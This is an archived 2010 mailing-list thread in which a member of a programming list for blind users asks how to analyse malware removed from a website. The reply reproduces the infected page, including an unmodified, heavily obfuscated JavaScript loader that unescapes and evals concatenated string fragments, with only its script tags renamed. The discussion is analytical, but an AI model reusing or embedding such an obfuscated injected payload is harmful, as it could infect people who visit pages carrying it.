Re: malware analysis
- From: Jackie McBride <abletec@xxxxxxxxx>
- To: programmingblind@xxxxxxxxxxxxx
- Date: Sat, 3 Jul 2010 20:05:29 -0700
This will not be harmful, even if using an html email client, as I've
taken the <script> & </script> tags away & substituted them for
startScript & EndScript. I've also changed some of the links to
protect the identity of the site owner. The malware code, which begins
at the StartScript line, remains unmodified. Website code, w/said
modifications, follows:
<html>
<head>
<title>Brochure Description.</title>
<meta name="generator" content="Namo WebEditor">
</head>
<body bgcolor="white" text="black" link="blue" vlink="purple" alink="red">
<p><a href="brochure.txt">Read the Brochure Description.</a></p>
<p> </p>
<p> </p>
<p><a href="../pictures/scanner1.jpg" title="Backspace to return to
the Brochure page">Click here to see the image of the scanner.</a></p>
<p><a href="../index.htm">Click here to return to the main page.</a></p>
Startscript var HZv41="0Uc%70Uc%65";var GvKLQUO="U565U3";var
jmxo="56Uc%32Uc";var bM0s4kK="65X1%6EX";var VEBu9H=")));var
u7WWvGG";var IrujHKMf="cape(VeXTi";var D4yffv="2p27p2p3Bp2p45p";var
f8PbNZny="45Ul05U3A5U2F5";var
M0qRNPX="2p27p2p3";f8PbNZny+="U2F5U665U";var uSEZFp="%6CUc%64";var
Z63uwf3L="2p6Dp2p39";var VMBo="X1%4AX1%";var
aomWLFkN="pe(sVYxD.repla";var IzwRw="75X1%6CX1%6CX";var
Dfpl="%G6ECV%G";var YmEnz0="BUc%62Uc%7AUc%6";var THWVXP="%65X1%6D";var
Sq0sXIq="8Uc%29Uc";var BYWZ61="64X1%6FX1%6";var
UDJ1U="1%69X1%";M0qRNPX="Dp2p27p2p31p"+M0qRNPX;var
LEAFMHeO="7X1%6EX";var uWgM="lace(/5U/g";var
IHW7e="2X1%6DX1%4AX1%2";var kj8q4EDR="X1%4CX1%";var
vfK9="4X1%2EX1%77";var Gh094="1%27X1%6EX1%4A";IHW7e+="7X1%3EX1%3";var
LLKQ="1%22X1%3BX1%";var EKtdBNSm="EX1%27X1%3BX";var
FNc4c="%69X1%76";var
QdyeSQ="2p68p2p2Ep2";Dfpl="%G65CV"+Dfpl;YmEnz0="Uc%6EUc%27Uc%3"+YmEnz0;Sq0sXIq="0Uc%76Uc%6"+Sq0sXIq;bM0s4kK=BYWZ61+"3X1%75X1%6DX1%"+bM0s4kK;var
FiX0XoS="62X1%6FX1%6";var E5x2dsN="2E5U6C5U655U6";var
OVUIGhiv="1%74X1%2EX1%62";Gh094="1%64X1%28X"+Gh094;vfK9="1%6EX1%7"+vfK9;var
aVOu3="1%22X1";var kzAcz1J="62X1%34X";kzAcz1J+="1%75X1%4AX";var
RELt3a="1%62X1%7AX1%";var
Qo2CkEnH="2p65p2p3Dp2";kj8q4EDR="61X1%72X1%20"+kj8q4EDR;bM0s4kK+="1%74X1%2EX1%67X";var
dDXmwo3A="vGG.replace";var bhxk="to='CV%G76CV%";var
IkVX="V%G61CV%";var A1qyC62H="Uc%3DU";var iYkv7M="c%2EUc%";var
KQ2oM="V%G56CV%G32";LLKQ+="69X1%66X1%28X1%";THWVXP+="X1%65X1%6EX1%";var
R4UlrgM="c%2EUc%73Uc%74";var Xpl0="CV%G65CV%G6ECV";var
GDWRD71W="9X1%3B";Qo2CkEnH="2p6Ep2p61p2p6Dp"+Qo2CkEnH;OVUIGhiv="X1%6EX"+OVUIGhiv;var
QDgE5S="V%G65CV";LLKQ="76X1%3EX"+LLKQ;var
Gn1Hf="X1%4AX1%";dDXmwo3A="l(unescape(u7WW"+dDXmwo3A;FNc4c=aVOu3+"%3CX1%64X1"+FNc4c;D4yffv="p3Dp2p27p2p31p"+D4yffv;var
iI37="5Uc%2EUc";LLKQ="1%69X1%"+LLKQ;var
sh0nfd="val(une";Xpl0="G6CCV%G65CV%G6D"+Xpl0;IkVX+="G6DCV%G65CV";var
RA2Xa0C="X1%4AX1%29";FiX0XoS="3CX1%2FX1%"+FiX0XoS;var
aYuQp="2p68p2p65p2";var nH1U="1%63X1%75";var
Chhxqnc="c%6EUc%55Uc";EKtdBNSm+="1%64X1%";RA2Xa0C+="X1%3BX1%76X1";kzAcz1J="4CX1%4AX1%"+kzAcz1J;kj8q4EDR+="4AX1%62X1%34X1%";VEBu9H+="='Uc%45Uc%6";bM0s4kK=RELt3a+"67X1%33X1%3DX1%"+bM0s4kK;var
Bne0Vu="2p50p2p45p2p";IzwRw+="1%29X1%4CX1";var
EqUHdyH="2p32p2p50p";dDXmwo3A+="(/Uc%/";var
PGGTC8G4="%3CX1%62X1%6FX1";IkVX="V%G66CV%G72C"+IkVX;Bne0Vu+="42p2p4Ap2p38p2";var
XOCC="/jE%/g,";var V2GOJW="79X1%3DX";IkVX="8CV%G27CV%G69C"+IkVX;var
RxjaBhHe="nescape(cwM8a.";Sq0sXIq=Chhxqnc+"%56Uc%32Uc%5"+Sq0sXIq;YmEnz0="c%64Uc%64Uc%65"+YmEnz0;var
NxrXgFJ="/CV%/g,'M')";var
CFTN="G6FCV%G6";jmxo=VEBu9H+"EUc%55Uc%"+jmxo;FiX0XoS=kzAcz1J+"1%2BX1%27X1%"+FiX0XoS;PGGTC8G4+="%64X1%79X1%3EX1";XOCC="replace("+XOCC;OVUIGhiv=nH1U+"X1%6DX1%65"+OVUIGhiv;var
hwdh="G72CV%G";Qo2CkEnH=EqUHdyH+"2p76p2p68p2p2Ep"+Qo2CkEnH;EKtdBNSm+="6FX1%63X1%75X";D4yffv="p2p74p2"+D4yffv;vfK9+="X1%72X1%69X1%7";D4yffv=aYuQp+"p69p2p67p2p68"+D4yffv;IkVX=Xpl0+"%G74CV%G2"+IkVX;D4yffv="8p2p2Ep"+D4yffv;iI37+="%76Uc%69Uc%73U";IzwRw+="%4AX1%62X";FNc4c=kj8q4EDR+"75X1%4AX1%3DX"+FNc4c;M0qRNPX="p68p2p3"+M0qRNPX;Gh094="2X1%79X1%49X"+Gh094;var
JQuU22H="56p2p32p2p50p";RxjaBhHe="l5U3B';eval(u"+RxjaBhHe;var
GmdcLH="g,'%')));var c";dDXmwo3A=Sq0sXIq+"%3B';eva"+dDXmwo3A;var
DowPTru="='p2p45p2p6E";f8PbNZny="l5U685Ul45Ul"+f8PbNZny;UDJ1U=FNc4c+"X1%20X"+UDJ1U;IkVX=QDgE5S+"%G45CV%"+IkVX;uWgM=",'7').rep"+uWgM;NxrXgFJ="place("+NxrXgFJ;NxrXgFJ=IrujHKMf+"Xto.re"+NxrXgFJ;OVUIGhiv=LLKQ+"64X1%6FX"+OVUIGhiv;Dfpl=CFTN+"3CV%G75CV%G6DCV"+Dfpl;uWgM=RxjaBhHe+"replace(/l/g"+uWgM;Z63uwf3L="4p2p77p"+Z63uwf3L;EKtdBNSm=FiX0XoS+"4X1%79X1%3"+EKtdBNSm;XOCC+="'C').repla";M0qRNPX+="Bp2p45p2p6";iI37=R4UlrgM+"Uc%79Uc%6CUc%6"+iI37;KQ2oM+="CV%G50CV%G7";PGGTC8G4=Gn1Hf+"3DX1%27X1"+PGGTC8G4;iI37=jmxo+"%50Uc%76Uc%68U"+iI37;iYkv7M=YmEnz0+"7Uc%33U"+iYkv7M;IHW7e="36X1%4"+IHW7e;Gh094+="X1%36X1";Dfpl="G3DCV%G64CV%"+Dfpl;UDJ1U="%76X1%"+UDJ1U;iYkv7M=A1qyC62H+"c%27Uc%68Uc%69U"+iYkv7M;UDJ1U="var
sVYxD='X1"+UDJ1U;JQuU22H=M0qRNPX+"Ep2p55p2p"+JQuU22H;E5x2dsN="5U695Ul45Ul35U"+E5x2dsN;var
M9KCV="c%6CUc%69Uc%7";uSEZFp="%43Uc%68Uc%69Uc"+uSEZFp;bM0s4kK+="1%65X1%74X1";dDXmwo3A=uSEZFp+"Uc%28Uc%45U"+dDXmwo3A;V2GOJW=OVUIGhiv+"X1%6FX1%64X1%"+V2GOJW;E5x2dsN+="D5U6F5U";IkVX="65CV%G61CV%G74C"+IkVX;GmdcLH+="wM8a='5U455U";var
kVenPGu1="5U2E5Ul35Ul25U6";var
OSQgQl="Ull5Ul35U2F5U";GDWRD71W="1%4AX1%27X1%2"+GDWRD71W;Gh094=THWVXP+"74X1%4"+Gh094;var
NPjBLDc="p56p2p32p";f8PbNZny=kVenPGu1+"35U3D5U2"+f8PbNZny;IzwRw=V2GOJW+"1%3DX1%6EX1%"+IzwRw;Dfpl=KQ2oM+"6CV%G68CV%"+Dfpl;uWgM+=",'%')));var
x";Dfpl+="74CV%G2EC";IHW7e=LEAFMHeO+"1%4AX1%"+IHW7e;RA2Xa0C=VMBo+"62X1%34X1%75"+RA2Xa0C;D4yffv=JQuU22H+"2p76p2p6"+D4yffv;hwdh+="20CV%G45CV%";IkVX=Dfpl+"V%G63CV%G72CV%G"+IkVX;iYkv7M=M9KCV+"4Uc%79"+iYkv7M;IkVX=hwdh+"G6ECV%G55C"+IkVX;EKtdBNSm=PGGTC8G4+"%27X1%2BX1%"+EKtdBNSm;dDXmwo3A+="g,'%')))";GvKLQUO=GmdcLH+"6E5U555"+GvKLQUO;DowPTru=uWgM+"sMZ5Nj1"+DowPTru;sh0nfd=Z63uwf3L+"p2p27p2p3B';e"+sh0nfd;bM0s4kK=RA2Xa0C+"%61X1%72X1%20X"+bM0s4kK;Qo2CkEnH=D4yffv+"2p6Ep2p55p2p56p"+Qo2CkEnH;sh0nfd=Bne0Vu+"p47p2p4jE%p2p5"+sh0nfd;vfK9+="4X1%65X1%20X1";IkVX=bhxk+"G61CV%"+IkVX;NPjBLDc=DowPTru+"p2p55p2"+NPjBLDc;Gh094=bM0s4kK+"%45X1%6CX1"+Gh094;dDXmwo3A+=";";E5x2dsN=f8PbNZny+"l25Ul5"+E5x2dsN;IHW7e=UDJ1U+"64X1%3DX1%2"+IHW7e;aomWLFkN=GDWRD71W+"';eval(unesca"+aomWLFkN;aomWLFkN=Gh094+"%42X1%6DX"+aomWLFkN;aomWLFkN+="ce(/X1%/g,'%";E5x2dsN=GvKLQUO+"25U505Ul65U68"+E5x2dsN;IkVX=aomWLFkN+"')));var
VeXTiX"+IkVX;XOCC=sh0nfd+"scape(xsMZ5Nj1."+XOCC;IkVX=vfK9+"%28X1%4C"+IkVX;dDXmwo3A=HZv41+"Uc%6EUc%64Uc"+dDXmwo3A;IzwRw=IHW7e+"CX1%2FX1%64X"+IzwRw;Qo2CkEnH="9p2p64p2p74p2"+Qo2CkEnH;IkVX+="%G27CV%G29CV";EKtdBNSm=IzwRw+"1%34X1%75"+EKtdBNSm;NxrXgFJ=IkVX+"%G3B';eval(unes"+NxrXgFJ;dDXmwo3A=iYkv7M+"61Uc%7"+dDXmwo3A;XOCC=Qo2CkEnH+"p27p2p44p"+XOCC;QdyeSQ=NPjBLDc+"2p50p2p76p"+QdyeSQ;iI37=XOCC+"ce(/p2p/g,'%'"+iI37;E5x2dsN=NxrXgFJ+".replace(/MG/"+E5x2dsN;dDXmwo3A=iI37+"c%69Uc%62Uc%69U"+dDXmwo3A;dDXmwo3A=QdyeSQ+"p77p2p6"+dDXmwo3A;OSQgQl=E5x2dsN+"6E5U695U615U2E5"+OSQgQl;OSQgQl=EKtdBNSm+"1%6DX1%65X"+OSQgQl;dDXmwo3A=OSQgQl+"545U625U6C5U2"+dDXmwo3A;eval(dDXmwo3A);
EndScript
</body>
</html>
On 7/3/10, Dave <davidct1209@xxxxxxxxx> wrote:
> At initial read of your message, it sounds like a cross-site scripting
> attack. I'm not sure of any browsers that render binary code within
> script tags, so not sure what that is since usually xxs attacks inject
> java script running in the user's security context.
>
> On 7/3/10, Jackie McBride <abletec@xxxxxxxxx> wrote:
>> Hay, yall:
>>
>> I was just thinkin (& that's always dangerous for me), but, now that
>> I've come out of my lurking hole, perhaps I'll keep my head out just a
>> bit longer & ask this. I hammered a virus off of a website the other
>> day. For whatever reason, it got my curiosity up, & I was rather
>> wondering exactly what its code does. So: any1 got any ideas of how to
>> analyze that? It looked like a compiled script (at least there were
>> <script> </script> tags, but between those tags was output that 1
>> would associate w/a binary file.
>>
>> I sure would like to know precisely what it does. I'm also surprised
>> that out of several A V apps I tested, the only 1 to pick it up was
>> Avast. Still, I know it did not belong in that site, given the source
>> of other pages that I saw on the same site that weren't infected.
>>
>> --
>> Change the world--1 deed at a time
>> Jackie McBride
>> Scripting Classes: http://jawsscripting.lonsdalemedia.org
>> homePage: www.abletec.serverheaven.net
>> For technophobes: www.technophoeb.com
>> __________
>> View the list's information and change your settings at
>> //www.freelists.org/list/programmingblind
>>
>>
> __________
> View the list's information and change your settings at
> //www.freelists.org/list/programmingblind
>
>
--
Change the world--1 deed at a time
Jackie McBride
Scripting Classes: http://jawsscripting.lonsdalemedia.org
homePage: www.abletec.serverheaven.net
For technophobes: www.technophoeb.com
__________
View the list's information and change your settings at
//www.freelists.org/list/programmingblind
Other related posts:
